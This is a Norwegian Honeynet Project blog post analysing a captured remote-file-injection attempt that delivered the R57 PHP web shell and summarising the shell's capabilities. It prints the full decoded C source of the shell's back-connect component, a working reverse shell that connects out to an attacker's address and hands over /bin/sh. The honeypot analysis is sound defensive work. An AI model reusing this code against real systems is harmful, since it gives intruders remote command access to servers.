Norwegian Honeynet Project


A chapter of the Honeynet Project

Nasty RFI attempt

March 24th, 2008 by erlend (0) Analysis

We saw a nasty RFI (remote file injection) attack attempt against a PHP application the other day. It tried to a include a script from a txt-file on a remote server. We downloaded the file to analyze it and it contains a lot of different features.

It’s called “LupuSheL R57 Shell” and it seems it has been active around the web for over two years. It claims to be written by 1dt.w0lf from RST/GHC.

The script was well over 100KB and most features were implemented in PHP. It supported english and russian language and was actually commented! The features ranged from allowing download/upload of arbitrary files, to dumping and exporting database servers, whether it be MySql, MSSQL, PostgreSQL or Oracle. It also provided system information from cpuinfo, memory, free space etc.

If the script was successful, opening the exploit URL could actually cause a basic authentication where both the username and password was the name of the script (“r57″). In the version we got this was disabled.

We also noticed some large base64-encoded sections. After decoding them, we found that the script contained a shell in C and Perl versions, both for connecting back to the attacker and for opening a port on the attacked server. For it to work the php-script would decode, compile and run the c-version, or decode and run the perl-version. Below is the decoded C-version of the backconnect script.
#include <stdio>
#include <sys>
#include <netinet>
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in sin;
char rms[21]="rm -f ";
daemon(1,0);
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]);
bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
perror("[-] connect()");
exit(0);
}
strcat(rms, argv[0]);
system(rms);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl("/bin/sh","sh -i", NULL);
close(fd);
}
A funny thing I noticed is that one of the comments actually says “ANY MODIFIED REPUBLISHING IS RESTRICTED”. Like an attacker would care…

Leave a Reply

You must be to post a comment.

© Norwegian Honeynet Project 2013. Powered by Wordpress/Arcsin.
valid CSS valid XHTML